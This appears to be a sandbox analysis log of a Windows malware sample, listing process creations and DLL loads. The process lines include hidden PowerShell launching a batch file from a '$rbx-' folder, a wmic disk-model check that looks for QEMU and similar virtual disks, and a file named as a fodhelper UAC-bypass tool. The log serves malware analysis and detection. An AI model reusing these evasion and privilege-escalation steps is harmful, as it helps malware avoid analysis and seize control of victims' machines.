Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\paint.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe Section loaded: pdh.dll
Source: C:\Windows\explorer.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll
